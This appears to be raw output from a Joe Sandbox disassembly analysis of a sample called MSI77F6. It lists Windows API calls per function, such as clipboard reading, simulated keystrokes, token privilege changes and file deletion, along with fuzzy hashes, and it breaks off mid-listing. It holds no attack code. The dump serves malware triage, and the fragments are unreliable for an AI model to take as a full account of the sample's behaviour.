                                        • Instruction Fuzzy Hash: A0D067362105149FCB01AF99D848C9577E9FB4D6507018451F509DB231D665EC509B95
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,007E49DA,?,?,00000000), ref: 00774FC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 13326f58cadff0a4b808cf46e5454e82f209765095a64bdd861caa1bbfe88210
                                        • Instruction ID: 8b40df57f6f5d79a24ba084333c33a3b62a05da00441cbed315e32aef2e00f7d
                                        • Opcode Fuzzy Hash: 13326f58cadff0a4b808cf46e5454e82f209765095a64bdd861caa1bbfe88210
                                        • Instruction Fuzzy Hash: A6D0C97464020CBFEB10CB90DC46FAA7BBDEB04718F200194F600A62D0D2F2BE408B55
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: ed4f1ea31bf394f98d29ad7f9f96f8694d3f14786e11cba811e94134d30ba067
                                        • Instruction ID: 5401ffb3517588e3b5d7f8d00856660cad5d9e6fdbdb3bd26a6bb59227693977
                                        • Opcode Fuzzy Hash: ed4f1ea31bf394f98d29ad7f9f96f8694d3f14786e11cba811e94134d30ba067
                                        • Instruction Fuzzy Hash: 01D0C9B1544245DBEB306F69E80875AB7E4BF41300F248829E9CA82250D7BEACC29B51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction ID: b51879d3dfc0e7a113e116895c6b31b498c06800c7e02b7809ee99b0f12d1e2f
                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction Fuzzy Hash: D9B0927248030CB7CE012A82EC02E493B199B50660F008020FB0C18161A677AAA19A89
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,007750BE,?,00775088,?,0077BE3D,008322E8,?,00000000,?,00773E2E,?,00000000,?), ref: 0077510C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: ce1fa3ae815bc23b1237f5fcdd2ec35fb07b1853962322b40d300cf903f907dd
                                        • Instruction ID: 0abe0451546345637e043dcd58fbb20d731981b50d3329f805508ff6c32bda9f
                                        • Opcode Fuzzy Hash: ce1fa3ae815bc23b1237f5fcdd2ec35fb07b1853962322b40d300cf903f907dd
                                        • Instruction Fuzzy Hash: D2E0B675400B02CBC6314F1AE844452FBF5FFE13A13218A2FD1E9826A0D7B45886DB90
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 007DF64E
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DF6AD
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DF6EA
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DF711
                                        • SendMessageW.USER32 ref: 007DF737
                                        • _wcsncpy.LIBCMT ref: 007DF7A3
                                        • GetKeyState.USER32(00000011), ref: 007DF7C4
                                        • GetKeyState.USER32(00000009), ref: 007DF7D1
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DF7E7
                                        • GetKeyState.USER32(00000010), ref: 007DF7F1
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DF820
                                        • SendMessageW.USER32 ref: 007DF843
                                        • SendMessageW.USER32(?,00001030,?,007DDE69), ref: 007DF940
                                        • SetCapture.USER32(?), ref: 007DF970
                                        • ClientToScreen.USER32(?,?), ref: 007DF9D4
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 007DF9FA
                                        • ReleaseCapture.USER32 ref: 007DFA05
                                        • GetCursorPos.USER32(?), ref: 007DFA3A
                                        • ScreenToClient.USER32(?,?), ref: 007DFA47
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DFAA9
                                        • SendMessageW.USER32 ref: 007DFAD3
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DFB12
                                        • SendMessageW.USER32 ref: 007DFB3D
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DFB55
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DFB60
                                        • GetCursorPos.USER32(?), ref: 007DFB81
                                        • ScreenToClient.USER32(?,?), ref: 007DFB8E
                                        • GetParent.USER32(?), ref: 007DFBAA
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DFC10
                                        • SendMessageW.USER32 ref: 007DFC40
                                        • ClientToScreen.USER32(?,?), ref: 007DFC96
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DFCC2
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DFCEA
                                        • SendMessageW.USER32 ref: 007DFD0D
                                        • ClientToScreen.USER32(?,?), ref: 007DFD57
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DFD87
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DFE1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3461372671-4164748364
                                        • Opcode ID: 7c7f05924d1660341fc221d59673aa0755586c2b653e5228aa5ff04668805e3d
                                        • Instruction ID: f25ae11362babe53ed8409b57b2b847806afe7f32ab7dee891adfe83285adbbc
                                        • Opcode Fuzzy Hash: 7c7f05924d1660341fc221d59673aa0755586c2b653e5228aa5ff04668805e3d
                                        • Instruction Fuzzy Hash: 6032AD71208245AFDB20EF64C888AAABBF5FF48354F14492AF696873B1D738DC54CB51
                                        APIs
                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007DAFDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 3850602802-328681919
                                        • Opcode ID: 0d82bd8ac266b1806fc967a2aafb38d5eed9c7af7ab3673858ece1b33dfbfd79
                                        • Instruction ID: 9eb1c3dff3e73496d52c93eb286879b27037c9314c88de17a992aeebe32e9eb2
                                        • Opcode Fuzzy Hash: 0d82bd8ac266b1806fc967a2aafb38d5eed9c7af7ab3673858ece1b33dfbfd79
                                        • Instruction Fuzzy Hash: 0B12ADB1600208BBEB258F64CC49FAE7BB9FF45350F14825AF519EB2D1DB788941CB52
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0078F796
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007E4388
                                        • IsIconic.USER32(000000FF), ref: 007E4391
                                        • ShowWindow.USER32(000000FF,00000009), ref: 007E439E
                                        • SetForegroundWindow.USER32(000000FF), ref: 007E43A8
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007E43BE
                                        • GetCurrentThreadId.KERNEL32 ref: 007E43C5
                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007E43D1
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007E43E2
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007E43EA
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007E43F2
                                        • SetForegroundWindow.USER32(000000FF), ref: 007E43F5
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E440A
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4415
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E441F
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4424
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E442D
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4432
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E443C
                                        • keybd_event.USER32(00000012,00000000), ref: 007E4441
                                        • SetForegroundWindow.USER32(000000FF), ref: 007E4444
                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 007E446B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: 5af0624c6186da8556df2c87d1301b53da170af25082d7e5a8cd1be748b138f8
                                        • Instruction ID: a7a1a1e3aaafb5fa44ed4b86963e31825d4ae4311bf589fe165d61a95f8d5fe2
                                        • Opcode Fuzzy Hash: 5af0624c6186da8556df2c87d1301b53da170af25082d7e5a8cd1be748b138f8
                                        • Instruction Fuzzy Hash: 443183B1B40258BBEB316B769C49F7F3F6DEB49B50F108015FA04EA1D0C6B85D10EAA4
                                        APIs
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                          • Part of subcall function 007B7B9F: __wsplitpath.LIBCMT ref: 007B7BBC
                                          • Part of subcall function 007B7B9F: __wsplitpath.LIBCMT ref: 007B7BCF
                                          • Part of subcall function 007B7C0C: GetFileAttributesW.KERNEL32(?,007B6A7B), ref: 007B7C0D
                                        • _wcscat.LIBCMT ref: 007B6B9D
                                        • _wcscat.LIBCMT ref: 007B6BBB
                                        • __wsplitpath.LIBCMT ref: 007B6BE2
                                        • FindFirstFileW.KERNEL32(?,?), ref: 007B6BF8
                                        • _wcscpy.LIBCMT ref: 007B6C57
                                        • _wcscat.LIBCMT ref: 007B6C6A
                                        • _wcscat.LIBCMT ref: 007B6C7D
                                        • lstrcmpiW.KERNEL32(?,?), ref: 007B6CAB
                                        • DeleteFileW.KERNEL32(?), ref: 007B6CBC
                                        • MoveFileW.KERNEL32(?,?), ref: 007B6CDB
                                        • MoveFileW.KERNEL32(?,?), ref: 007B6CEA
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 007B6CFF
                                        • DeleteFileW.KERNEL32(?), ref: 007B6D10
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B6D37
                                        • FindClose.KERNEL32(00000000), ref: 007B6D53
                                        • FindClose.KERNEL32(00000000), ref: 007B6D61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 1867810238-1173974218
                                        • Opcode ID: 00f391b82017b7eb8223291ad4bc1ed7a1df6b4e0da7ac91827a5b34bfd208a9
                                        • Instruction ID: e6ed193e27710b0efbf0ac9c7ee301abfb9da5b0000c5395d7204b2b139c0d40
                                        • Opcode Fuzzy Hash: 00f391b82017b7eb8223291ad4bc1ed7a1df6b4e0da7ac91827a5b34bfd208a9
                                        • Instruction Fuzzy Hash: DF510D72A0415CAADF21EBA0DC88FEA777DBF05304F4445D6E659A3141DB38AB88CF61
                                        APIs
                                        • OpenClipboard.USER32(0080DBF0), ref: 007C70C3
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 007C70D1
                                        • GetClipboardData.USER32(0000000D), ref: 007C70D9
                                        • CloseClipboard.USER32 ref: 007C70E5
                                        • GlobalLock.KERNEL32(00000000), ref: 007C7101
                                        • CloseClipboard.USER32 ref: 007C710B
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007C7120
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 007C712D
                                        • GetClipboardData.USER32(00000001), ref: 007C7135
                                        • GlobalLock.KERNEL32(00000000), ref: 007C7142
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007C7176
                                        • CloseClipboard.USER32 ref: 007C7283
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 1c42fc7f394564c5fcc5e166a8e13555fe94b28522f5e59d6782bf06df7b7e7a
                                        • Instruction ID: 4781c1364254537c6b6b45e43ddf67396dcaf3441f7d97b3ef3792109dbc698b
                                        • Opcode Fuzzy Hash: 1c42fc7f394564c5fcc5e166a8e13555fe94b28522f5e59d6782bf06df7b7e7a
                                        • Instruction Fuzzy Hash: FC51DE31208205ABD725EB64CC8AF7E77A9BB88B41F00851DF54AD61E1EF68DD04CB62
                                        APIs
                                          • Part of subcall function 007ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007ABF0F
                                          • Part of subcall function 007ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007ABF3C
                                          • Part of subcall function 007ABEC3: GetLastError.KERNEL32 ref: 007ABF49
                                        • _memset.LIBCMT ref: 007ABA34
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007ABA86
                                        • CloseHandle.KERNEL32(?), ref: 007ABA97
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007ABAAE
                                        • GetProcessWindowStation.USER32 ref: 007ABAC7
                                        • SetProcessWindowStation.USER32(00000000), ref: 007ABAD1
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007ABAEB
                                          • Part of subcall function 007AB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007AB9EC), ref: 007AB8C5
                                          • Part of subcall function 007AB8B0: CloseHandle.KERNEL32(?,?,007AB9EC), ref: 007AB8D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                        • String ID: $default$winsta0
                                        • API String ID: 2063423040-1027155976
                                        • Opcode ID: 83cbc3e7d98704cdce66822780f49b17ea5cabd7fb34295af562b4b584d8eca2
                                        • Instruction ID: 3148aed5bb5a0c7679dd1e4fb33fae40532fbbca0d206843af32ee93ccc4bcb2
                                        • Opcode Fuzzy Hash: 83cbc3e7d98704cdce66822780f49b17ea5cabd7fb34295af562b4b584d8eca2
                                        • Instruction Fuzzy Hash: B4815971800209EFDF119FA4DD49EEEBBB9FF49314F048219F915A6162DB398E14EB60
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007C2065
                                        • _wcscmp.LIBCMT ref: 007C207A
                                        • _wcscmp.LIBCMT ref: 007C2091
                                        • GetFileAttributesW.KERNEL32(?), ref: 007C20A3
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007C20BD
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007C20D5
                                        • FindClose.KERNEL32(00000000), ref: 007C20E0
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007C20FC
                                        • _wcscmp.LIBCMT ref: 007C2123
                                        • _wcscmp.LIBCMT ref: 007C213A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C214C
                                        • SetCurrentDirectoryW.KERNEL32(00823A68), ref: 007C216A
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007C2174
                                        • FindClose.KERNEL32(00000000), ref: 007C2181
                                        • FindClose.KERNEL32(00000000), ref: 007C2191
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1803514871-438819550
                                        • Opcode ID: c560ae8813ab2c06d9d99bb24382498452a7195bd4c83cdd99f2e3b8edb2c6f1
                                        • Instruction ID: 0ccc7d9947e8f312281e4d7997c7ad77c3096ae94797e66cd4f11538270f1fb9
                                        • Opcode Fuzzy Hash: c560ae8813ab2c06d9d99bb24382498452a7195bd4c83cdd99f2e3b8edb2c6f1
                                        • Instruction Fuzzy Hash: 3E31823150021DBBDF20ABA4EC48FEE77ADAF05360F15406AE911E2191DB7CDE85CA65
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • DragQueryPoint.SHELL32(?,?), ref: 007DF14B
                                          • Part of subcall function 007DD5EE: ClientToScreen.USER32(?,?), ref: 007DD617
                                          • Part of subcall function 007DD5EE: GetWindowRect.USER32(?,?), ref: 007DD68D
                                          • Part of subcall function 007DD5EE: PtInRect.USER32(?,?,007DEB2C), ref: 007DD69D
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007DF1B4
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DF1BF
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DF1E2
                                        • _wcscat.LIBCMT ref: 007DF212
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DF229
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007DF242
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007DF259
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007DF27B
                                        • DragFinish.SHELL32(?), ref: 007DF282
                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007DF36D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 2166380349-3440237614
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007C21C0
                                        • _wcscmp.LIBCMT ref: 007C21D5
                                        • _wcscmp.LIBCMT ref: 007C21EC
                                          • Part of subcall function 007B7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B7621
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007C221B
                                        • FindClose.KERNEL32(00000000), ref: 007C2226
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007C2242
                                        • _wcscmp.LIBCMT ref: 007C2269
                                        • _wcscmp.LIBCMT ref: 007C2280
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C2292
